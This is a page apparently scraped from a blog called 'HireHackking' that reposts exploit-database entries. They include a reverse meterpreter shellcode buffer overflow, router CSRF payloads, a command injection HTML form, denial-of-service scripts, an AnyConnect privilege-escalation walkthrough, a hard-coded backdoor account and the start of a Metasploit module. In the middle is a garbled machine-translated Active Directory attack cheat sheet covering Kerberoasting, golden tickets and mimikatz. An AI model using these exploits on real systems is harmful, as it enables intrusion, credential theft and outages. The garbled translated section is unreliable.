Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863153214

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: CVE-2017-6351 - WePresent undocumented privileged manufacturer backdoor account 
# Date: 27/02/2017
# Exploit Author: Quentin Olagne
# Vendor Homepage: http://www.wepresentwifi.com/ or http://www.awindinc.com/products_wepresent_wipg_1500.html
# Software Link: http://www.awindinc.com/products_wepresent_wipg_1500.html
# Version: All versions of WiPG-1500 devices up to the latest firmware (1.0.3.7)
# Tested on: Latest firmware (1.0.3.7) of WiPG-1500 device
# CVE : CVE-2017-6351

WiPG-1500 device embeds a firmware with a manufacturer account with hard coded username / password. 
Once the device is set in DEBUG mode, an attacker can connect to the device using telnet protocol and log in the device with the 'abarco' hard-coded manufacturer account. 

This account is not documented, neither the DEBUG feature nor the use of telnetd on a port TCP/5885 (when debug mode is ON).

Here's the extract of the linux 'passwd' file:
root:x:0:0:root:/home:/bin/sh
abarco:x:1000:0:Awind-Barco User,,,:/home:/bin/sh

and the 'shadow':
root:$1$x1mFoD3w$uuvn.Z0p.XagX29uN3/Oa.:0:0:99999:7:::
abarco:$1$JB0Pn5dA$sROUF.bZVoQSjVrV06fIx1:0:0:99999:7:::

This vulnerability has been reported to the vendor but this product (WiPG-1500) is no longer maintained. This means it's a #WONTFIX vulnerability. Vendor has removed the 'abarco' account on the newest models but don't worry, DEBUG mode is still there with telnetd and you can also use the r00t account with a home and /bin/sh on the other systems in any case.
HireHackking 
# Exploit Title: SysGauge 1.5.18 – buffer overflow in SMTP connection verification function leads to code execution
# Date: 2017-02-28
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe
# Version: 1.5.18
# Tested on: Windows Server 2008 R2 Standard x64
# CVE : requested

# The shellcode has to be split into 2 pieces  for the exploit to work and has to be placed at the offsets like shown below.
# The 1st part can be max. 236 bytes 
# The 2nd part can be max. 76  (leave at least 4 NOPs)


import socket

# QtGui4.dll 0x6527635E - CALL ESP
jmp = "\x5e\x63\x27\x65"
nops = "\x90"*8


# reverse meterpreter shell 306 bytes long bad chars \x00\x0a\x0b\x20 
#IP: 192.168.198.128, PORT: 4444
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=4444 -f c -b \x00\x0a\x0d\x20 --smallest

rev_met_1=("\x6a\x47\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1f\x2d"
"\x97\x97\x83\xeb\xfc\xe2\xf4\xe3\xc5\x15\x97\x1f\x2d\xf7\x1e"
"\xfa\x1c\x57\xf3\x94\x7d\xa7\x1c\x4d\x21\x1c\xc5\x0b\xa6\xe5"
"\xbf\x10\x9a\xdd\xb1\x2e\xd2\x3b\xab\x7e\x51\x95\xbb\x3f\xec"
"\x58\x9a\x1e\xea\x75\x65\x4d\x7a\x1c\xc5\x0f\xa6\xdd\xab\x94"
"\x61\x86\xef\xfc\x65\x96\x46\x4e\xa6\xce\xb7\x1e\xfe\x1c\xde"
"\x07\xce\xad\xde\x94\x19\x1c\x96\xc9\x1c\x68\x3b\xde\xe2\x9a"
"\x96\xd8\x15\x77\xe2\xe9\x2e\xea\x6f\x24\x50\xb3\xe2\xfb\x75"
"\x1c\xcf\x3b\x2c\x44\xf1\x94\x21\xdc\x1c\x47\x31\x96\x44\x94"
"\x29\x1c\x96\xcf\xa4\xd3\xb3\x3b\x76\xcc\xf6\x46\x77\xc6\x68"
"\xff\x72\xc8\xcd\x94\x3f\x7c\x1a\x42\x45\xa4\xa5\x1f\x2d\xff"
"\xe0\x6c\x1f\xc8\xc3\x77\x61\xe0\xb1\x18\xd2\x42\x2f\x8f\x2c"
"\x97\x97\x36\xe9\xc3\xc7\x77\x04\x17\xfc\x1f\xd2\x42\xfd\x1a"
"\x45\x57\x3f\xd9\xad\xff\x95\x1f\x3c\xcb\x1e\xf9\x7d\xc7\xc7"
"\x4f\x6d\xc7\xd7\x4f\x45\x7d\x98\xc0\xcd\x68\x42\x88\x47\x87"
"\xc1\x48\x45\x0e\x32\x6b\x4c")


rev_met_2=("\x68\x42\x9a\xed\xe3\x9b\xe0\x63"
"\x9f\xe2\xf3\x45\x67\x22\xbd\x7b\x68\x42\x75\x2d\xfd\x93\x49"
"\x7a\xff\x95\xc6\xe5\xc8\x68\xca\xa6\xa1\xfd\x5f\x45\x97\x87"
"\x1f\x2d\xc1\xfd\x1f\x45\xcf\x33\x4c\xc8\x68\x42\x8c\x7e\xfd"
"\x97\x49\x7e\xc0\xff\x1d\xf4\x5f\xc8\xe0\xf8\x96\x54\x36\xeb"
"\xe2\x79\xdc\x2d\x97\x97")


buffer = "A"*176+rev_met_2+"A"*2+jmp+"B"*12+nops+rev_met_1
port = 25
s = socket.socket()
ip = '0.0.0.0'             
s.bind((ip, port))            
s.listen(5)                    

 
print 'Listening on SMTP port: '+str(port)
print(len(rev_met_1))
print(len(rev_met_2))
 
while True:
	conn, addr = s.accept()     
	conn.send('220 '+buffer+'ESMTP Sendmail \r\n')
	conn.close()
HireHackking 
Author		: 	B GOVIND
Exploit Title	: 	DLink DSL-2730U Wireless N 150, Change DNS Configuration  bypassing ‘admin’ privilege
Date		: 	01-03-2017
Vendor Homepage	: http://www.dlink.co.in
Firmware Link	: ftp://support.dlink.co.in/firmware/DSL-2730U
Affected version	:  Hardware ver C1, Firmware ver: IN_1.0.0
Email id	: govindnair7102@gmail.com 
CVE		:  CVE-2017-6411

Change DNS Configuration Bypassing ‘admin’ Privilege
-------------------------------------------------------

D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts ‘admin’, ‘support’ and ‘user’. As per D-Link only “admin" account has unrestricted access to change configuration of device. Account name ‘user’ can just view configuration settings and statistics.

1.	Description of Vulnerability

Cross Site Request Forgery can be used to manipulate dnscfg.cgi in this device. An insider / external attacker (remote management to be enabled for external attacker) can change primary and secondary DNS IP address to some malicious IP address without using ‘admin’ account. 

2.	Proof of Concept	

Use following URL to modify the DNS entries:

	http://user:user@192.168.1.1/dnscfg.cgi?dnsPrimary=x.x.x.x&dnsSecondary=y.y.y.y&dnsIfcsList=&dnsRefresh=1

	Here x.x.x.x and y.y.y.y are the malicious IP address attacker can use.



3.	Impact of vulnerability
	
Information Disclosure:  An attacker exploiting this vulnerability can obtain confidential information like users browsing profile. Modifying device DNS settings allows cybercriminals to perform malicious activities like the following:

(a)	 Redirect user traffic to malicious/fake sites. These sites can be phishing pages that spoofs well-known sites and tricks users into submit sensitive user credentials like banks account username and password.

(b)	This can ensure that no more patches are updated from OS vendor sites or firewall sites.

(c)	Replace ads on legitimate sites and serve users with unwanted/fake ads.

(d)	Pushing malwares.

4.	Solution

As per D-Link India this is the only no updated firmware is available for this hardware version which can mitigate this vulnerability which avoids privilege escalation. 
All users of this hardware should change default passwords of not just ‘admin’ account but also ‘user’ and ‘support’

Change All Account Password Bypassing ‘admin’ Privilege
----------------------------------------------------------
 
    D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts ‘admin’, ‘support’ and ‘user’. As per D-Link only “admin" account has unrestricted access to change configuration of device. Account name ‘user’ can just view configuration settings and statistics. Default password of admin, support and user account are admin, support and user respectively.
 
1.  Description of Vulnerability
 
    Cross Site Request Forgery can be used to manipulate password.cgi in this device. An insider / external attacker (remote management to be enabled for external attacker) can change password of all the three accounts without using ‘admin’ account. 
 
2.  Proof of Concept    
 
This exploit works only when accounts are using default password.
 
Use following URL to change  ‘admin’ account password from ‘admin’ to 
‘admin1’.
 
    http://user:user@192.168.1.1/password.cgi?
inUserName=admin&inPassword=ZGFyZWFkbWluMQ==&inOrgPassword=ZGFyZWFkbWlu
 
(b) Use following URL to change ‘support’ account password from ‘support’ to 
‘support1’.
 
http://user:user@192.168.1.1/password.cgi?
inUserName=support&inPassword=ZGFyZXN1cHBvcnQx&inOrgPassword=ZGFyZXN1cHBvcnQ=
 
(c) Use following URL to change ‘user’ account password from ‘user’ to 
‘user1’.
 
http://user:user@192.168.1.1/password.cgi?
inUserName=user&inPassword=ZGFyZXVzZXIx&inOrgPassword=ZGFyZXVzZXI=
 
Here ‘inPassword’ is the new password and ‘inOrgPassword’ is the existing password. Both these password strings are base64 encoded for confidentiality as connection between browser and web server is using http.
 
 
3.  Impact of vulnerability
     
Elevation of privilege, Information Disclosure, Denial Of service
 
(a) Insider/Attacker can change the passwords of all the existing accounts and control the device as required. This will result in attacker having complete control over the device. He can capture traffic of other user and analyse traffic. Attacker can deny services as per his/her choice.
 
4.  Solution
 
    As per D-Link India this is the only no updated firmware available for this hardware version which can mitigate this vulnerability. All users of this hardware should change default passwords of all the default accounts.


Enable/Disable LAN side Firewall without admin privilege
---------------------------------------------------------

	D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts ‘admin’, ‘support’ and ‘user’. As per D-Link only “admin" account has unrestricted access to change configuration of device. Account name ‘user’ can just view configuration settings and statistics. Default password of admin, support and user account are admin, support and user respectively.

1.	Description of Vulnerability

	Cross Site Request Forgery can be used to manipulate lancfg2.cgi in this device. An insider / external attacker (remote management to be enabled for external attacker) can enable/disable LAN side firewall without ‘admin’ privilege using ‘user ‘ account. 

2.	Proof of Concept	

   Use following URL to enable LAN side firewall

	http://user:user@192.168.1.1/lancfg2.cgi?ethIpAddress=192.168.1.1&eth SubnetMask=255.255.255.0&enblLanFirewall=1&enblIgmpSnp=0&enblIgmpMode=0&dhcpEthStart=192.168.1.2&dhcpEthEnd=192.168.1.254&dhcpLeasedTime=86400&enblDhcpSrv=1&enblLan2=0&enblLanDns=0



Use following URL to disable LAN side firewall

http://user:user@192.168.1.1/lancfg2.cgi?ethIpAddress=192.168.1.1&ethSubnetMask=255.255.255.0&enblLanFirewall=0&enblIgmpSnp=0&enblIgmpMode=0&dhcpEthStart=192.168.1.2&dhcpEthEnd=192.168.1.254&dhcpLeasedTime=86400&enblDhcpSrv=1&enblLan2=0&enblLanDns=0


3.	Impact of vulnerability
	
By disabling LAN side firewall and by enabling Port Triggering, an attacker can ensure a backdoor access within LAN side as well as from WAN side.
Attacker can run port scanning tools to map services which otherwise wont be possible with firewall enabled.

4.	Solution

	As per D-Link India this is the only no updated firmware available for this hardware version which can mitigate this vulnerability. All users of this hardware should change default passwords of all the default accounts.
HireHackking 
# Exploit Title: Cisco AnyConnect Start Before Logon (SBL) local privilege escalation. CVE-2017-3813
# Date: 02/27/2017
# Exploit Author: @Pcchillin
# Software Link: http://www.cisco.com/c/en/us/support/security/anyconnect-secure-mobility-client/tsd-products-support-series-home.html
# Version: 4.3.04027 and earlier
# Tested on: Windows 10
# CVE : CVE-2017-3813
# Vendor ID : cisco-sa-20170208-anyconnect


#Run CMD.EXE with system privileges
1. Start Cisco anyconnect from logon screen.
2. Once the Cisco app comes up (where you can select a profile and hit connect) hold CTRL and hit B.
3. When the Cisco about window appears then select the URL at the bottom. This will open Internet Explorer or you can select Chrome if installed.
4. Once Internet Explorer is started press CTRL-O, then select browse. Chrome press CTRL-O and explorer will open.
5. You can then navigate to the C:\Windows\System32\ folder and find CMD.exe then right click and select RunAsAdministrator.


#Run scripts from USB flash drive
Follow steps from above and navigate to the flash drive right click and select run. You can also edit the document.
Example bat script:
Net user #USERNAME #PASSWORD /add
Net localgroup administrators #USERNAME /add


#Vendor link to advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170208-anyconnect
#Twitter handle @pcchillin
HireHackking 
# Exploit Title: Synchronet BBS 3.16c for Windows – Multiple vulnerabilities
# Date: 2017-02-28
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: ftp://synchro.net/Synchronet/sbbs316c.zip
# Version: 3.16c for Windows
# Tested on: Windows 7 Pro SP1 x64, Windows Server 2008 R2 Standard x64 
# CVE : CVE-2017-6371

import socket
import time
import sys

try:
    host = sys.argv[1]
    port = 80
except IndexError:
    print "[+] Usage %s <host>  " % sys.argv[0]
    sys.exit()


exploit = "\x41"*4096

buffer = "GET /index.ssjs HTTP/1.1\r\n"
buffer+= "Host: 192.168.198.129\r\n"
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\
r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
buffer+="Accept-Encoding: gzip, deflate\r\n"
buffer+="Referer: "+exploit+"\r\n"
buffer+="Connection: keep-alive\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="Content-Length: 5900\r\n\r\n"

i = 1
while i < 957:
	try:
		s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		connect=s.connect((host,port))
		print("[*] Try: "+str(i))
		s.send(buffer)
		s.close()
		i=i+1
	except:
		print("[-] The service seems to be down\r\n")
		break


print("[i] Waiting a few seconds before starting a second attack.\r\n")
time.sleep(25)
print("[*] Second run to trigger the DoS")
i = 1
while i < 957:
        try:
		s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                connect=s.connect((host,port))
                print("[*] Try: "+str(i))
                s.send(buffer)
                s.close()
                i=i+1
        except:
                print("[-] The service seems to be down.\r\n")
                break

print("[i] Wait before the final strike.\r\n")
time.sleep(25)
print("[*] Third run to trigger the DoS")
i = 1
while i < 957:
        try:
                s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                connect=s.connect((host,port))
                print("[*] Try: "+str(i))
                s.send(buffer)
                s.close()
                i=i+1
        except:
                print("[-] The service seems to be down.\r\n")
                print("[!] It can take a few seconds for the service to crash\r\n")
                break
HireHackking

情報収集

一般的に使用されるコマンドネット使用

ネットビュー

タスクリスト /v

ipconfig /all

ネットグループ /ドメインすべてのドメインユーザーグループのリストを取得する

ネットグループ「ドメイン管理者」 /ドメインドメイン管理者のリストを取得する

ネットグループ「エンタープライズ管理者」 /ドメインエンタープライズ管理者のリストを取得する

ネットローカルグループ管理者/ドメインドメイン内蔵管理者グループユーザー(エンタープライズ管理者、ドメイン管理者)を取得します

ネットグループ「ドメインコントローラー」 /ドメインドメインコントローラーのリストを取得する

ネットグループ「ドメインコンピューター」 /ドメインすべてのドメインメンバーコンピューターのリストを取得する

ネットユーザー /ドメインすべてのドメインユーザーのリストを取得する

ネットユーザーSomeUser /Domain指定されたアカウントのsomeUserに関する詳細情報を取得する

ネットアカウント /ドメインドメインパスワードのポリシー設定、パスワードの長さ、エラーロック、その他の情報を取得する

nltest /domain_trusts Get domain Trust Information SPN SCAN SETSPN -T TARGET.COM -Q */*

現在のホストのDNSがIN -DNSである場合、DNSを照会してロケーションドメインコントロールを記録できます。

nslookup -type=all _ldap._tcp.dc._msdcs.rootkit.org

ipconfig /all

ポート:88,389,53ドメインチューブログインマシンPowerPick Find -DomainUserLocation -Useridentity Administrator #Viewユーザーロケーション

get-userevent

PowerPick Invoke-EventHunter #View Log

データ収集

:0101010#リスト共有

ネットシェア

#ネットワークコンピューターをリストします

ネットビュー

#リモートPCの共有をリストします

ネットビューComputer_name /すべての#リスト共有ローカルホスト

wmic share get /format:list

#リモートPCの共有をリストします

wmic /node: computer_name shareドメイン#内のファイルに関連するコンピューター名を検索する#すべてのドメインコンピューターをリストし、名前の「ファイル」ですべてのコンピューターをフィルタリングします

ネットグループ「ドメインコンピューター」 /ドメイン| findstr 'file'powerView

チートシートフィンドドメインシェア

get-domainfileserver

基本情報

データベース情報

https://blog.netspi.com/finding-sensitive-data-domain-servers-using-powerupsql/

情報コレクション#すべてのローカルSQLインスタンス:を見つけます

get -sqlinstancelocal -verbose

#ドメイン/Network:ですべてのSQLインスタンスを見つけます

get -sqlinstancedomain -verbose

get -sqlinstanceBroadcast -verbose

get-sqlinstancescanudp -verbose image.png

詳細を取得#ローカルSQLインスタンスに関する基本情報を列挙する

get-sqlinstancelocal | get-sqlserverinfo

#リモートSQLインスタンスに関する基本情報を列挙します

get-sqlserverinfo -instance 'srv-web-kit.rootkit.org'use!現在のユーザーがログインできるインスタンスをリストします

get-sqlinstancedomain –verbose | get-sqlconnectionTestThreaded - verbose - threads 10

インスタンスの管理者権限を取得してみてください

Invoke -sqlescalatepriv -verbose -instance 'computer_name'

デフォルトのパスワードを使用した列挙

get -sqlinstancedomain -verbose | get -sqlserverlogindefaultpw -verbose

データベース情報をダンプします

Invoke -sqldumpinfo -verbose -instance 'computer_name'

自動監査を使用します

Invoke -sqlaudit -verbose -instance 'computer_name'

機密情報

Import-Module PowerUpSql.psd1

$ servers=get-sqlinstancedomain –verbose | get -sqlconnectionTestThreaded –verbose -threads 10

$ accessible=$ servers | where-object {$ _。status –eq "アクセス可能"}

$アクセス可能| get -sqlcolumnsampledatathaTheded - verbose - threads 10 - keyword「カード、パスワード」 - サンプリング2 –validatecc -nodefaults | ft -autosize

----

get-sqlcolumnsampledata - verbose –keyword「カード、パスワード」 - サンプリング2 –validatecc –nodefaults –instance 'server1 \ instance1'

コバルトストライクのsqlclient(横方向の動きでも使用)

github image

powerupsql

のsqlclient#powerview:を使用して特定のユーザーがログインしている場所を見つけます

find -domainuserlocation -useridentity user_name

#PowerView3360を使用してユーザーのグループがログインしている場所を見つけます

find -domainuserlocation -usergroupidentity group_name

または、Sharppsniperを使用すると、管理者パスワードが必要です

$ secpassword=convertto secureString 'password123!' -asplaintext -force

$ cred=new-object System.management.automation.pscredential( 'testlab \ dfm.a'、$ secpassword)

get -domainusevent -computername primary.testlab.local -credential $ cred -maxevents 1000

ターゲティングユーザー

https://github.com/daftack/mailsniper

ユーザーのパスワードがある場合は、彼の受信トレイを表示できます

#ターゲットエクスチェンジサーバーをautodiscoverし、ユーザー@example.comのメールボックスを検索します

Invoke -selfsearch -OutputCSV local -results.csv -mailbox user@example.com

#リモート交換サーバー(この場合はオンラインで交換)を指定し、user@example.comのメールボックスを検索します

invoke -selfsearch -remote -exchhostname Outlook.Office365.com -OutputCSV local-results.csv -mailbox user@example.com

mailsniper

http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/

userhunting

https://github.com/hausec/adape-script

PowerShell.exe -ExecutionPolicy Bypass ./adape.ps1 PS:このスクリプトは、血液犬に似た非常に大きなアクションを持ち、大規模なリクエストがあります。すべてのモジュールはGitHubからダウンロードし、管理者の権限が必要です。オフラインの浸透と承認テスト中の使用に適しています。等。主に次の脆弱性:をスキャンします

•WPAD、LLMNR、NBT-NSスプーフィングを介してハッシュを収集します

•MS14-025

•Kerberoastを介してアカウントを収集するためのハッシュ

•BloodHoundを介してターゲットを特定します

•テストのリリース

•ネットワーク上のオープンSMB共有を検索します

•SMB共有で敏感な文字列を検索します

•ネットワーク上のシステムパッチを確認します

•ファイルサーバーを検索します

•添付ファイルを検索します

•収集のためのドメイン戦略のワンクリックスキャン

set -executionpolicy bypass ./adape.ps1 -allまたは指定されたモジュール

./adape.ps1 -gpp -pview -kerberoast

ドメインの脆弱性スキャン

。\ standin.exe - spn

SPNスキャン

https://github.com/ropnop/kerbrute/releases/tag/v1.0.3

最初にユーザー名を破裂させますが、通常は直接確認できます

./kerbrute_darwin_amd64 userenum -d rootkit.org users.txt収集されたパスワードを取得してバッチでバーストします。ドメイン内のパスワードは、強力で弱いパスワードを見つけて、より多くの情報収集を行うことができます。

Import-Module。\ Sharphound.ps1

InvokeBloodhound -verbose -domain 'domain.local' -domaincontroller 'dc01.domain.local' -ldapuser 'targetuser' -ldappass 'targetpass' -collectionmethodすべての最高のクエリPractices3https://github.com/hausec/bloodhound-custom-queries/blob/master/customqueries.json3https://github.com/integration-it/active-directory-exploite-cheat-cheet/master/f%20-20bloodhound

コレクターなしでブラッドハウンドを使用する(ldapsearchのもの)

Linux環境でBloodhoundの使用

ドメインでのブラスト

優先度1:Rubeusリクエスト、ハッシュカットブラスト。\ rubeus.exe kerberoast

Hashcat -m 13100 /tmp/hash.txt /tmp/password.list -o found.txt ---forceスキャンSPNサービス3https://github.com/nidem/kerberoast/blob/master/getuserspns.ps1

setspn -t 0day.org -q */*

または

getUserSpns.pyクライアントはサーバー側を要求し、STチケットadd -Type -AssemblyName System.IdentityModelを取得するために爆発します

new-Object System.IdentityModel.Tokens.kerberosRequestorseCurityToken -ArgumentList 'MSSQLSVC/SRV-WEB-KIT.ROOTKIT.ORG' Export TicketKerberos3360:LIST/EXPORT KERBEROS33https://GITHUB.com

または、Invoke-kerberoast.ps1import-module。\ invoke-kerberoast.ps1を使用します

Invoke-kerberoastはすべての情報image.pngを返します。

invoke -kerberoast -admincount -outputformat hashcat | flhashcat crack

Hashcat -M 13100 /tmp/hash.txt /tmp/password.list -o found.txt ---force

BloodHoundの使用

spnスキャンkerberosting

ソース:https://github.com/uknowsec/active-directory-pentest-notes/blob/master/notes/%E5%9f%9f%E6%B8%97%E9%80%8F-MS14-068.md

MS14-068の対応するパッチはKB3011780です。このパッチがドメインコントロール上のSystemInfoを介してインストールされているかどうかを確認できます。 Pykekツールは脆弱性を悪用します

MS14-068.exe

MS14-068.EXE -U SQLADMIN@0DAY.ORG -P ADMIN!@#45 -S S-1-5-21-1812960810-23355050734-3517558888888888888888888888805-1142 -D OWA2010SP3.0DAY.ORG

-uドメインアカウント+@+ドメイン名、Jerry+@+Rootkit.orgです

-Pは現在のユーザーのパスワード、つまりjerryのパスワードです

-SはジェリーのSID値であり、ユーザーのSID値はwhoami/allを通じて取得できます

-dは、現在のドメインのドメイン制御です。スクリプトを正常に実行すると、現在のディレクトリにCCacheファイルが生成されます。

:を利用します

ミミカッツ

klist purge

kerberos:ptc tgt_sqladmin@0day.org.ccache

アクセスドメインコントロール:

dir \\ owa2010sp3.0day.org \ c $

ドメイン内MS14-068エスカレーション

goldenpac.exe 0day.org/sqladmin:admin !@#45@owa2010sp3.0day.org

image.png

:3https://3GSTUDENT.github.io/%e5%9F%9F%9F%9F%E6%B88%97%E9%80%8%8%8%8%8歳から:3https://3GSTUDENT.GITHUB.IO/%E5%80%8A%8A%8A%8F-8F-KERBEROAST/AFTERは、SPN修正を取得することができます。時間、そしてひび割れた後、私たちは平文パスワードを取得します。たとえば、spnvnc/dc1.test.comをドメインユーザー管理者に追加すると、パラメーターは次のとおりです。

setspn.exe -u -a -vnc/dc1.test.com管理者は、ドメイン内の任意のホストでこのSPNを取得でき、以下の図に示すようにKerberoastを使用してTGを取得できます。ハッシュカットを使用して割れます。 SPNのパラメーターは次のとおりです。

setspn.exe -d vnc/dc1.test.com管理者

pykek

https://GITHUB.COM/UKNOWSEC/ACTIVE-DIRECTORY-Pentest-notes/Blob/Master/Notes/%E5%9F%9F%E6%B8%97%E9%80%8F-Ticket.md

KRBTGTのパスワードのハッシュ値は、ゴールドチケットを生成するために必要です。

lsadump:dcsync /owa20103.0day.org /user3360krbtgt

Krbtgtハッシュを取得した後、MimikatzでKerberos:Golden関数を使用して、Golden.kiribiを生成します。

パラメーター説明:

/管理者:Forgedユーザー名

/ドメイン:ドメイン名

/sid:sid値、最後の値は削除されていることに注意してください。

/krbtgt:krbtgtのハッシュ値

/チケット:生成されたチケット名

SIDはRed Frameパートimage.pngです

Kerberos:Golden /admin:Administrator /Domain:0Day.org /SID:S-1-5-21-1812960810-2335050734-3517558805 /KRBTGT:36F9D9E6D98ECF8307BAF4F46EF842A2 /TICKET:GOLDEN.KIRIBI

ミミカッツのインポートと利用

Kerberos:purge

Kerberos:ptt golden.kiribi

Kerberos:List

goldenpac.exe

銀のメモを作成するための条件:

1。ドメイン名

2。ドメインのSID値

3.ドメインサービスアカウントハッシュのパスワード(krbtgtではなく、ドメインコントロールです)

4.偽造されたユーザー名は任意のユーザー名にすることができます、ここにシルバーがあります

利用プロセス

まず、サービスアカウントのパスワードハッシュを知る必要があります。ここでは、ドメインコントロールも例として取ります。 Mimikatzを使用して、現在のドメインアカウント管理者のハッシュ値を表示します。管理者アカウントのハッシュはここでは使用されていませんが、OWA2010SP3 $のハッシュは使用されています。

sekurlsa:3360logonpasswords

この時点で、OWA2010SP3 $のハッシュ値が取得され、シルバーノートはMimikatzを介して生成されます。

パラメーター説明:

/ドメイン:現在のドメイン名

/sid:sid値は、金のチケットのように、前の部分を取ります

/ターゲット:ターゲットホスト、こちらはOWA2010SP3.0day.orgです

/サービス:サービス名、ここで共有ファイルにアクセスする必要があるので、CIFSです

/RC4:ターゲットホストのハッシュ値

/ユーザー:Forgedユーザー名

/PTT:それは、生成されたチケットをメモリにインポートするPass Theticket攻撃を意味します。また、kerberos:pttを使用してエクスポートしてからインポートすることもできます。

/

kerberos3:3360golden /domain:0day.org /sid:S-1-5-21-1812960810-250734-3517558805 /Target:OWA2010SP3.0DAY /サービス3:CIFS /RC4:125445ED1D553393CCE9585E64E3FA07 /USER:SILVER /PTT

ドメイン内の権限は維持されます

ルートドメインのSIDを知っている場合、Mimikatzを使用して、サブドメインのkrbtgtのハッシュ値を介して[RID=519](ドメインフォレストで最も高い許可)を使用して、Enterpriseadminsグループの許可[RID=519](ドメインフォレストで最も高い許可)を使用してチケットを作成できます。

次に、ルートドメインSIDを含む新しいゴールドノートがMimikatzによって再生されます。 StartOffsetとEndinはそれぞれオフセットと長さを表し、RenewMaxは生成された請求書の最大時間を表します。

ステップ1。SID(PowerView Module): Convert-Nametosid Uknowsec.cn \ krbtgtを取得します

ステップ2。KERBEROS:3360GOLDEN /ADMIN:ADMINISTRATOR /DOMAIN:NEWS.UKNOWSEC.CN /SID:XXX(CHILD-DOMAINSID) /SIDS:XXX-519 /krbtgt:xxx /startoffset33600 /endin:600 /renledmax:10080 /ptt

Kerberostingのバックドア利用

特権:3360Debug

MISC:SKELETON

Goldenticket

シルバーティケッツ

クエリ3種類の委任情報

standin.exe - 解雇

image.png

またはPowerView非制約の代表団

Import-Module PowerView.ps1を使用してPowerViewスクリプトをロードした後、次のコマンドを使用してクエリします。

ドメイン内の制約のない委任で構成されたアカウントを照会します。

get -netuser -unconstrained -domain rootkit.org

ドメイン内の制約のない委任で構成されたホストを照会します。

get -netcomputer -Unconstrained -domain rootkit.org

制約委任

ドメインで制約委任を構成するアカウントを照会します。

get -domainuser -trustedtoauth-

HireHackking 
import socket


# Title: BlueIris - Denial of Service
# Date: 2017-02-28
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://blueirissoftware.com/blueiris.exe
# Version: 4.5.1.4
# Tested on: Windows Server 2008 R2 Standard x64


# Start this fake FTP server and create an FTP connection in the software. Use the "Test" button to trigger the vulnerability.

buffer = "A"*5000
port = 21
s = socket.socket()
ip = '0.0.0.0'             
s.bind((ip, port))            
s.listen(5)                    

 
print 'Listening on FTP port: '+str(port)
 
while True:
	conn, addr = s.accept()     
	conn.send('220 '+buffer+'\r\n')
	conn.recv(1024)
	conn.send('250 '+buffer+'\r\n')
	conn.close()
HireHackking 
# Exploit Title: NETGEAR Firmware DGN2200v1/v2/v3/v4 CSRF which leads to RCE through CVE-2017-6334
# Date: 2017-02-28
# Exploit Author: SivertPL
# Vendor Homepage: http://netgear.com/
# Software Link: http://www.downloads.netgear.com/files/GDC/DGN2200/DGN2200%20Firmware%20Version%201.0.0.20%20-%20Initial%20Release%20(NA).zip
# Version: 10.0.0.20 (initial) - 10.0.0.50 (latest, still 0-day!)
# Tested on: DGN2200v1,v2,v3,v4

# CVE: CVE-2017-6366

A quite dangerous CSRF was discovered on all DGN2200 firmwares.
When chained with either CVE-2017-6077 or CVE-2017-6334, allows for unauthenticated (sic!) RCE after tricking somebody logged in to the router to view a website.

<!DOCTYPE html>
<html>
	<title>netgear router CSRF</title>
	<body>
		<form method="POST" action="http://192.168.0.1/dnslookup.cgi">
			<input type="hidden" name="host_name" value="www.google.com; reboot"> <!-- CVE-2017-6334 payload -->
			<input type="hidden" name="lookup" value="Lookup">
			<button name="clc" value="clc">Would You Dare To?</button> 
		</form>
	</body>
</html>

<!-- 2017-02-27 by SivertPL -->
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  HttpFingerprint = { :pattern => [ /JAWS\/1\.0/ ] }

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'MVPower DVR Shell Unauthenticated Command Execution',
      'Description' => %q{
        This module exploits an unauthenticated remote command execution
        vulnerability in MVPower digital video recorders. The 'shell' file
        on the web interface executes arbitrary operating system commands in
        the query string.

        This module was tested successfully on a MVPower model TV-7104HE with
        firmware version 1.8.4 115215B9 (Build 2014/11/17).

        The TV-7108HE model is also reportedly affected, but untested.
      },
      'Author'      =>
        [
          'Paul Davies (UHF-Satcom)', # Initial vulnerability discovery and PoC
          'Andrew Tierney (Pen Test Partners)', # Independent vulnerability discovery and PoC
          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
        ],
      'License'     => MSF_LICENSE,
      'Platform'    => 'linux',
      'References'  =>
        [
          # Comment from Paul Davies contains probably the first published PoC
          [ 'URL', 'https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/' ],
          # Writeup with PoC by Andrew Tierney from Pen Test Partners
          [ 'URL', 'https://www.pentestpartners.com/blog/pwning-cctv-cameras/' ]
        ],
      'DisclosureDate' => 'Aug 23 2015',
      'Privileged'     => true, # BusyBox
      'Arch'           => ARCH_ARMLE,
      'DefaultOptions' =>
